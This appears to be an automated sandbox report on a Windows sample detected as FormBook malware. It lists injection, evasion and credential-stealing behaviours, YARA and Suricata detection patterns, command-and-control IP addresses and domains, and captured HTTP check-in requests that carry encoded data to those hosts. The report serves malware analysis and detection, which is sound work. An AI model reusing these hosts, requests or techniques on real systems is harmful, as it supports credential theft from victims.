Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CCE 30411252024.exe

Overview

General Information

Sample name:CCE 30411252024.exe
Analysis ID:1566620
MD5:ace5b81f6392ca5ce9a2e0953e6d6e4e
SHA1:bb0a075a44d599c7976703e186e1a70f891f9163
SHA256:74c3f1d43d2fbd0eeab386cb0086150568cef240d65b2efd0061721d6a0514ed
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • CCE 30411252024.exe (PID: 3892 cmdline: "C:\Users\user\Desktop\CCE 30411252024.exe" MD5: ACE5B81F6392CA5CE9A2E0953E6D6E4E)
    • svchost.exe (PID: 1880 cmdline: "C:\Users\user\Desktop\CCE 30411252024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • UIOYLdBBxOZnTzrp.exe (PID: 876 cmdline: "C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 4632 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • UIOYLdBBxOZnTzrp.exe (PID: 6392 cmdline: "C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 992 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x3d839:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x26ed8:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CCE 30411252024.exe", CommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", ParentImage: C:\Users\user\Desktop\CCE 30411252024.exe, ParentProcessId: 3892, ParentProcessName: CCE 30411252024.exe, ProcessCommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", ProcessId: 1880, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\CCE 30411252024.exe", CommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", ParentImage: C:\Users\user\Desktop\CCE 30411252024.exe, ParentProcessId: 3892, ParentProcessName: CCE 30411252024.exe, ProcessCommandLine: "C:\Users\user\Desktop\CCE 30411252024.exe", ProcessId: 1880, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T14:31:14.937130+010020507451Malware Command and Control Activity Detected192.168.2.649794154.215.72.11080TCP
            2024-12-02T14:31:48.840215+010020507451Malware Command and Control Activity Detected192.168.2.649874116.50.37.24480TCP
            2024-12-02T14:33:12.635919+010020507451Malware Command and Control Activity Detected192.168.2.64992885.159.66.9380TCP
            2024-12-02T14:33:27.520840+010020507451Malware Command and Control Activity Detected192.168.2.65002391.195.240.9480TCP
            2024-12-02T14:33:50.947332+010020507451Malware Command and Control Activity Detected192.168.2.65002766.29.149.4680TCP
            2024-12-02T14:34:06.414054+010020507451Malware Command and Control Activity Detected192.168.2.650033195.110.124.13380TCP
            2024-12-02T14:34:38.079364+010020507451Malware Command and Control Activity Detected192.168.2.650038217.196.55.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.rssnewscast.com/fo8o/?U6YDsxW=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&cPm=bL-XkPyPkFAvira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: CCE 30411252024.exeReversingLabs: Detection: 73%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: CCE 30411252024.exeJoe Sandbox ML: detected
            Source: CCE 30411252024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2243558952.000000000006E000.00000002.00000001.01000000.00000004.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000000.2398470881.000000000006E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: CCE 30411252024.exe, 00000000.00000003.2157438700.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CCE 30411252024.exe, 00000000.00000003.2157797690.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2226784005.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2224840210.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.000000000330E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.0000000003170000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2329854953.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2318712990.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CCE 30411252024.exe, 00000000.00000003.2157438700.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CCE 30411252024.exe, 00000000.00000003.2157797690.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2226784005.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2224840210.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.4604829627.000000000330E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.0000000003170000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2329854953.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2318712990.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2318259516.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285670458.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000003.2255779981.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.4605259560.000000000379C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.000000000097E000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2637377690.000000003C10C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.4605259560.000000000379C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.000000000097E000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2637377690.000000003C10C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2318259516.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285670458.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000003.2255779981.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F26CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F26CA9
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00F260DD
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00F263F9
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2EB60
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F2F5FA
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2F56F FindFirstFileW,FindClose,0_2_00F2F56F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F31B2F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F31C8A
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F31F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0053BAB0 FindFirstFileW,FindNextFileW,FindClose,6_2_0053BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax6_2_00529480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi6_2_0052DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h6_2_00D8053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49794 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49874 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50027 -> 66.29.149.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49928 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50033 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50023 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50038 -> 217.196.55.202:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F34EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F34EB5
            Source: global trafficHTTP traffic detected: GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?U6YDsxW=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&cPm=bL-XkPyPkF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?U6YDsxW=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&cPm=bL-XkPyPkF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 212Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 55 36 59 44 73 78 57 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64 Data Ascii: 